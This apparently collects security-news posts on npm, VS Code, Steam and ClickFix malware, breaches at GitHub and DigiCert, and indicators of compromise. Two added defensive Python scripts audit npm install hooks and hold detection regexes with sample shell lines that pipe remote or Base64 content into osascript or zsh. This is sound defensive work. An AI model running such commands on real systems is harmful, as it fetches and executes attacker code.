This is what we've been seeing with every company we work with.
Try justifying spending 100k on token spend when only 18k even makes it to a stable prod feature.
In the rush to maximize AI token spend, companies are wasting over 44% on bug fixes
I think AI coding hype follows roughly four stages:
1. Amazement
You try it and can’t believe how much code it generates from a few prompts.
2. Expansion
You start more and more projects because shipping suddenly feels cheap and fast.
This is also the phase where people start convincing everyone around them:
- coworkers
- management
- friends in other companies
because nobody wants to “fall behind” in 6–12 months.
That creates a massive snowball/FOMO effect.
3. The grind phase
You realize the generated code has architectural issues, sloppy mistakes, weird abstractions, duplicated logic, broken edge cases, etc.
So you start:
- re-prompting
- switching models
- increasing reasoning effort
- reviewing fixes
- generating fixes for previous fixes
And suddenly you spend your days reviewing AI-generated pull requests instead of building software.
4. Realization
You realize AI coding increases output much faster than it increases certainty.
The code still needs:
- review
- testing
- ownership
- architectural understanding
- long-term maintenance
Usually by expensive senior engineers.
And the interesting thing is:
this whole cycle can take many months or even more than a year because people become socially and professionally invested in the narrative themselves.
Once teams, managers, and entire companies have been convinced that this is the future, it becomes psychologically and politically very hard to later say:
“Actually, the ROI is much lower than we expected.”
Chat, I don't want to be that guy, but I think Microsoft has really pissed off security researchers and we're approaching the tipping point.
This Eclipse guy has really rocked the boat for Microsoft.
⚠️ WARNING - A malicious npm package was caught stealing files from Claude AI users’ /mnt/user-data directories and uploading them to attacker-controlled GitHub repositories.
Check your installed packages: https://t.co/Ev9AKDSria
The package, “mouse5212-super-formatter,” used npm postinstall scripts, hard-coded GitHub tokens, and fake network logs to hide the theft.
Downloaded 676 times so far.
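One way to run the check the post asks for, as an added example that is not part of the original post: list every installed package that declares an npm install-time lifecycle script and flag the package name reported above. The function name and output shape are assumptions made for illustration.

```python
import json
import sys
from pathlib import Path

# Lifecycle hooks npm runs automatically while installing a package.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Package name reported in the post above.
REPORTED = {"mouse5212-super-formatter"}

def audit_node_modules(root):
    """Return sorted (name, hook, command, reported) rows for every package
    under root/node_modules, including nested and scoped packages."""
    root = Path(root)
    rows = []
    for manifest in root.rglob("package.json"):
        if "node_modules" not in manifest.relative_to(root).parts:
            continue  # the project's own manifest, not a dependency
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest
        if not isinstance(meta, dict):
            continue
        name = str(meta.get("name", manifest.parent.name))
        scripts = meta.get("scripts")
        if not isinstance(scripts, dict):
            scripts = {}
        found = [(h, str(scripts[h])) for h in INSTALL_HOOKS if h in scripts]
        if name in REPORTED and not found:
            found = [("(none)", "")]  # presence alone is a finding
        rows += [(name, hook, cmd, name in REPORTED) for hook, cmd in found]
    return sorted(rows)

if __name__ == "__main__":
    # Usage: python audit.py /path/to/project  (defaults to the current dir)
    for name, hook, cmd, reported in audit_node_modules(
            sys.argv[1] if len(sys.argv) > 1 else "."):
        flag = "REPORTED" if reported else "review"
        print(f"[{flag}] {name}: {hook} -> {cmd}")
```

Many legitimate packages use install hooks for native builds, so unflagged rows are a review list rather than a verdict; `npm install --ignore-scripts` stops these hooks from running at install time.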
We are working on our first cloud intrusion investigation for Threat Hunting Labs.
The lab is not live yet, but we wanted to start sharing some of the intrusion details because this case represents an important direction for THL.
The intrusion began with a compromised developer macOS workstation.
The workstation was infected by an infostealer. The developer had long-lived AWS access keys stored locally for a service integration and loaded them as environment variables during development.
Those credentials were collected by the stealer and later used from external infrastructure to access the AWS environment.
From there, the activity unfolded across 3 days and included:
- enumeration
- discovery
- privilege escalation
- lateral movement
- data exfiltration
This is exactly the kind of cloud intrusion we want analysts to investigate inside Threat Hunting Labs.
It connects endpoint compromise, developer credential exposure, AWS access, identity activity, cloud control-plane behavior, and attacker progression across time.
We are still building the lab, but we are excited about where this takes THL next.
Cloud intrusions are becoming a major focus for us, and this case will be the first full cloud investigation we bring to the platform.
To our knowledge, it will also be the first real cloud intrusion investigation of its kind available anywhere for hands-on analyst training.
PSA: Beyond The Dark (APPID: 3393800) on Steam is malware.
Hidden in the unitydll is a dropper which then downloads more malware from a C2 based on what programs and Chrome extensions you have (targeting crypto / defi wallets).
🚨 GitHub source code allegedly offered for sale: Internal orgs and private repositories claimed
A threat actor using the alias TeamPCP claims to be selling GitHub source code and internal organization data.
The actor claims the dataset includes around 4,000 private repositories and says samples can be provided to interested buyers to verify authenticity.
━━━━━━━━━━━━━━━━━━━━
Target: GitHub
Country: United States
Sector: Technology / Software Development / Source Code
Incident Type: Alleged Source Code Sale
Claimed Exposure: Around 4,000 private repositories
Actor: TeamPCP
Price: Offers over $50,000
━━━━━━━━━━━━━━━━━━━━
According to the post, the actor claims the material includes source code and internal organization data tied to GitHub’s main platform. The post also references a public file list and includes screenshots showing numerous repository archive names.
Why it matters:
If authentic, exposed source code and internal repository data could increase the risk of code review by hostile actors, vulnerability discovery, supply chain targeting, impersonation, phishing, and follow-on attacks against developer infrastructure.
Status:
This remains an unverified underground forum claim. The actor states this is not a ransom attempt and claims the data may be leaked publicly if no buyer is found.
‼️🚨 BREAKING: GitHub has been compromised by TeamPCP. GitHub has confirmed the internal breach. A poisoned VS Code extension on an employee device exfiltrated ~3,800 internal repositories.
TeamPCP is already selling the data on a cybercrime forum.
1/ We are sharing additional details regarding our investigation into unauthorized access to GitHub's internal repositories.
Yesterday we detected and contained a compromise of an employee device involving a poisoned VS Code extension. We removed the malicious extension version, isolated the endpoint, and began incident response immediately.
"Use a computer. Then make it vanish."
‼️https://t.co/Aua4aPjOHE allegedly advertised as disposable anonymous RDP service for Windows & Linux
A threat actor is promoting https://t.co/Aua4aPjOHE, a service marketed as a disposable cloud desktop platform offering anonymous Windows and Linux RDP access. The service advertises no-email signup, cryptocurrency-only payments, and full destruction of VMs, disks, and keys on termination, branded as "anonymous by design" and aimed at users seeking untraceable remote computing infrastructure.
Post details:
▸ Actor(s): gravem1nd (VIP)
▸ Sector: Anonymous Hosting / Disposable RDP
▸ Type: Service Advertisement
▸ Format: Browser-based RDP + SSH
▸ Country: Multi-region (DE, US, AU)
▸ Date: 10/05/2026
Service features:
▪ Full Windows or Linux RDP in-browser, deployable in under 60 seconds
▪ Supported OS: Windows 11, Windows Server 2022, Ubuntu, Debian, Fedora, Parrot
▪ Regions: Frankfurt, NYC, Sydney
▪ WireGuard kill switch, all traffic forced through encrypted VPN at firewall level
▪ No email signup, password-only authentication
▪ "Pop & Gone" destruction, VM, disk, and keys wiped on termination, advertised as unrecoverable
▪ LUKS full-disk encryption on NVMe storage at rest
▪ Browser RDP + SSH access, no client install required
▪ US and EU exit nodes for traffic routing
▪ Plans: Micro ($9/mo, 2 vCPU, 4GB RAM, 60GB, 1 Bubble), Standard ($19/mo, 4 vCPU, 8GB RAM, 120GB, 2 Bubbles), Pro ($39/mo, 6 vCPU, 12GB RAM, 180GB, 3 Bubbles)
▪ Payment: BTC, ETH, XMR, LTC plus 50 more cryptocurrencies
▪ Slogan: "No logs, no traces, no recovery"
DFIR Weekly Recap | This week brought fresh Linux kernel exploits, persistent firmware threats, and a surge in mobile-targeted malware campaigns.
• Copy Fail and DirtyFrag expose critical Linux page cache vulnerabilities exploited in the wild
• FIRESTARTER firmware implant survives patches and reboots, challenging traditional IR approaches
• UAT-8302 deploys extensive malware arsenal across multiple attack vectors
• CloudZ RAT targets OTP messages through specialized Pheno plugin capabilities
• TCLBANKER spreads Brazilian banking trojan via WhatsApp and Outlook channels
• OpenClaw skill distributes Remcos RAT and GhostLoader to unsuspecting users
• ClickFix leverages fake macOS utilities to deliver sophisticated infostealers
• State-sponsored actors hide behind Chaos ransomware operations
• WAInsight provides new open-source forensics for WhatsApp Android analysis
• HumanitarianBait masks infostealer campaign as legitimate humanitarian effort
Top stories in the thread below. #DFIR_Radar
Microsoft tracks macOS ClickFix campaign using fake utility guides to deliver SHub Stealer, Macsync, and AMOS infostealers. Three distinct attack chains bypass Gatekeeper by leveraging Terminal commands instead of traditional app bundles.
Key technical details:
• Initial access via fake troubleshooting sites hosting Base64-encoded Terminal commands
• Loader campaign creates persistence at ~/LaunchAgents/com.google.keystone.agent.plist mimicking Google Update
• Script campaign uses Telegram fallback C2 (hxxps://t[.]me/ax03bot) when primary infrastructure fails
• Helper campaign (AMOS) stages payloads in /tmp/helper or /tmp/update with virtualization detection
• All variants collect Keychain entries, browser credentials, cryptocurrency wallets, and iCloud data
Attack methodology:
• Social engineering through Medium blogs and Squarespace sites claiming macOS "fixes"
• Terminal execution bypasses Gatekeeper checks applied to .dmg files
• Russian/CIS keyboard layouts trigger kill switch in loader variant
• Trojanized crypto apps replace legitimate Trezor Suite, Ledger Wallet, and Exodus installations
Data exfiltration to endpoints like /api/debug/event, /gate/chunk, /upload.php, and /contact. Staging directories use patterns /tmp/shub_<random_ID> and clean up artifacts post-exfiltration.
Hunt for curl commands with Base64 payloads, osascript execution from network streams, and LaunchAgent plist creation in user directories.
#DFIR_Radar
‼️🚨 One of the world's largest Certificate Authorities, DigiCert, was compromised by a malicious screensaver file sent through a customer support chat. Their antivirus blocked the malware four times. The agent kept clicking. The fifth try got through.
27 code signing certificates were stolen and used to sign malware.
DigiCert ultimately revoked 60 certificates.
Per DigiCert's incident report, filed in Mozilla's CA compliance tracker as Bug 2033170, here is how it unfolded:
April 2: an attacker contacted a DigiCert helpdesk agent through the company's customer support chat channel, posing as a customer. The lure was a zip file pitched as a screenshot. Inside the zip was a .scr file. On Windows, .scr files are executables, and this one carried a malicious payload.
Opening a file a customer sent through the official support channel is what an agent is supposed to do. Support staff are the one role designed to accept files from strangers.
DigiCert's endpoint security blocked four infection attempts. On the fifth, the support analyst's machine was infected.
DigiCert detected the infection, ran an investigation, and concluded the incident was contained.
Eleven days later, an external researcher tipped DigiCert off about misuse of DigiCert-issued code signing certificates in the wild. That tip led to the discovery of a second compromised machine, belonging to a different support analyst, infected through the same vector. The EDR on that machine had not been functioning correctly, so the original investigation missed it.
The second machine gave the attacker access to DigiCert's internal support portal. That portal lets support staff reach limited views of customer accounts, including initialization codes for ordered but not-yet-issued code signing certificates. Combining a stolen initialization code with an approved order let the attacker pull a real, validly issued code signing certificate. They did this 27 times.
DigiCert's own list of what went wrong:
- File-type filtering on the customer support chat channel did not catch the .scr
- EDR coverage was inconsistent and incomplete, creating a blind spot
- Initialization codes for code signing certificates were not adequately protected
DigiCert says it got lucky. An outside researcher found the malware abuse before DigiCert did. Without that tip, the second machine and the active certificate theft might still be running today.
Introducing DFIR Labs: A 24-challenge series by internationally acclaimed CTF authors, tailored for professionals, researchers and students. Master DFIR, Malware Analysis and Threat Hunting through challenges designed to push your expertise to new heights
https://t.co/6lgoxMDt8f
New macOS malware campaign uses malicious Google ads to redirect victims to ClickFix-style fake Claude AI download pages. Attack leverages social engineering to trick users into manually executing Mach-O malware via terminal commands.
Attack chain breakdown:
• Malicious Google ad redirects to cladesktop.gitlab[.]io posing as legitimate Claude AI desktop app
• ClickFix-style page instructs users to copy/paste terminal commands for "installation"
• Downloads arm64 Mach-O executable (16.5MB) from arkypc[.]com/n8n/update to /tmp/helper
• Malware beacons to C2 server 45.94.47[.]204:80 and checks api.ipify[.]org for public IP
• Multiple suspicious domains registered March-April 2026 suggest coordinated infrastructure
DFIR artifacts:
• Terminal history shows pasted ClickFix commands and curl downloads
• Binary saved to /tmp/helper (SHA256: e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c)
• Network connections to C2 and IP geolocation services
• Browser history contains fake Claude domain visits
Hunt for recent /tmp/ executable downloads, suspicious curl commands in bash history, and connections to newly registered domains. Full PCAP and malware samples available.
#DFIR_Radar
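The hunt guidance in the two macOS ClickFix posts above (Base64 payloads piped to a shell, osascript fed from a network stream, user LaunchAgent plists, downloads and staging under /tmp), written as detection rules over telemetry lines. This is an added example, not code from either post; the rule names, the event format and every sample line are constructed for illustration.

```python
import re

# Hunt rules taken from the guidance in the two ClickFix posts above.
RULES = [
    # Base64 blob decoded and piped straight into a shell
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b")),
    # osascript reading its script from a network stream
    ("curl_piped_to_osascript",
     re.compile(r"\bcurl\b[^|]*\|\s*osascript\b")),
    # curl writing a download into /tmp
    ("curl_download_to_tmp",
     re.compile(r"\bcurl\b.*\s(-o|--output)\s+/(private/)?tmp/\S+")),
    # Per-user LaunchAgent plist; accepts ~/LaunchAgents (as written in the
    # post) and ~/Library/LaunchAgents, but not the system-wide /Library path
    ("user_launchagent_plist",
     re.compile(r"(/Users/[^/\s]+|~)/(Library/)?LaunchAgents/\S+\.plist\b")),
    # Staging paths named in the posts
    ("tmp_staging_path",
     re.compile(r"/tmp/(helper|update|shub_\w+)\b")),
]

# Constructed sample telemetry (shell history and file events); not real data.
SAMPLE = [
    'echo "<BASE64_PLACEHOLDER>" | base64 -D | zsh',
    "curl -fsSL https://guide.example.invalid/fix | osascript",
    "curl -s -o /tmp/helper https://downloads.example.invalid/update",
    "file_create /Users/alice/Library/LaunchAgents/com.google.keystone.agent.plist",
    "mkdir /tmp/shub_8f3a1c",
    "base64 -d cert.b64 > cert.der",                  # benign: no pipe to a shell
    "curl -s https://status.example.invalid/health",  # benign: plain request
    "file_create /Library/LaunchAgents/com.vendor.updater.plist",  # system-wide
]

def hunt(lines):
    """Return (line_number, rule_name) for every rule that matches a line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((n, name))
    return hits

if __name__ == "__main__":
    for n, rule in hunt(SAMPLE):
        print(f"line {n}: {rule}: {SAMPLE[n - 1]}")
```

A plist named like a Google updater is only suspicious in context, so correlate a `user_launchagent_plist` hit with the process that wrote the file before escalating.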
If you wanna stay on top of cybersecurity news, you need these sites in your RSS reader
BleepingComputer
DarkReading
RecordedFuture - The Record
SecurityWeek
DataBreachedNet
TheRegister
HackerNews (hit or miss)
KrebsOnSecurity
404Media
ArsTechnica
TechDirt